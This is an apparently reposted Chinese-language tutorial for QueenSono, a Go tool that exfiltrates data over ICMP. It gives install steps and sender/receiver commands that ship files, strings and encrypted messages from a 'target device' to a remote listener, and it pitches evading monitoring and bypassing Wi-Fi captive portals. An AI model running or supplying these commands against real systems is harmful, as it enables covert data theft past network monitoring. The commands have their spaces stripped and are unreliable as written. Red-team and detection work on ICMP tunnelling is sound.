如何使用QueenSono从ICMP提取数据

关于QueenSono

QueenSono是一款针对ICMP协议的数据提取工具，该工具基于Golang开发，并且只依赖于ICMP协议不受监控这一事实实现其功能。除此之外，该工具也可以用于基本的ICMP检查，或绕过某些身份验证机制，比如说许多公共Wi-Fi在连接到Wi-Fi(如机场Wi-Fi)后用于对用户进行身份验证。

工具安装

从源码安装：

广大研究人员可以直接使用下列命令将该项目源码克隆至本地，并安装好该工具所需的依赖组件：

gitclonehttps://github.com/ariary/QueenSono.git
makebefore.build

下列命令可以构建ICMP包发送器-qssender：

build.queensono-sender

下列命令可以构建ICMP包接收器-qsreceiver：

build.queensono-receiver

工具使用

ICMP包发送器-qssender将负责把ICMP数据包发送至监听器，因此我们需要将qssender源码传输到目标设备上。

ICMP包接收器-qsreceiver就是我们本地设备上的数据包监听器了。

所有的命令和工具参数都可以使用“–help”来查看。

(1) 工具使用样例1：发送包携带“ACK”

在这个例子中，我们将发送一个大型文件，并查看接收到数据包之后的回复信息：

在本地设备上，运行下列命令：

$qsreceiverreceive-l0.0.0.0-p-freceived_bible.txt

参数解释：

• -l 0.0.0.0：监听所有接口的ICMP数据包
• -f received_bible.txt：将接收到的数据存储至文件
• -p：显示接收数据的进度条

在目标设备上，运行下列命令：

$wgethttps://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt#downloadahugefile(fortheexample)

$qssendersendfile-d2-l127.0.0.1-r10.0.0.92-s50000bible.txt

参数解释：

• send file：发送文件
• -d 2：每两秒发送一个数据包
• -l 127.0.0.1：每次接收回复信息的监听地址
• -r 10.0.0.92：运行了qsreceiver 监听器的远程设备地址
• -s 50000：每个数据包需要发送的数据量大小

(2) 工具使用样例2：发送包不携带“ACK”

在这个例子中，我们希望在不等待回复信息的情况下发送数据：

在本地设备上，运行下列命令：

$qsreceiverreceivetruncated1-l0.0.0.0

参数解释：

• receive truncated 1：如果没有收到所有数据包，则不会无限期等待

在目标设备上，运行下列命令：

$qssendersend"thisisatestiwanttosendastringw/owaitingfortheechoreply"-d1-l127.0.0.1-r10.0.0.190-s1-N

参数解释：

• -N：无回复选项

(3) 工具使用样例3：发送加密数据

在这个例子中，我们将发送加密消息。由于命令行可能会被监控，因此我们将使用非对称加密(防止密钥泄露)：

在本地设备上，运行下列命令：

$qsreceiverreceive-l0.0.0.0--encrypt
<OUTPUTPUBLICKEY>

参数解释：

• –encrypt：使用加密交换，它将生成公钥/私钥。公钥将用于qssender加密数据，私钥将用于接收器解密数据

在目标设备上，运行下列命令：

$exportMSG="<yourmessage>"
$exportKEY="<public_key_from_qsreceiver_output>"
$qssendersend$MSG-d1-l127.0.0.1-r10.0.0.190-s5--key$KEY

参数解释：

• –key：提供数据加密的密钥

项目地址

QueenSono：【GitHub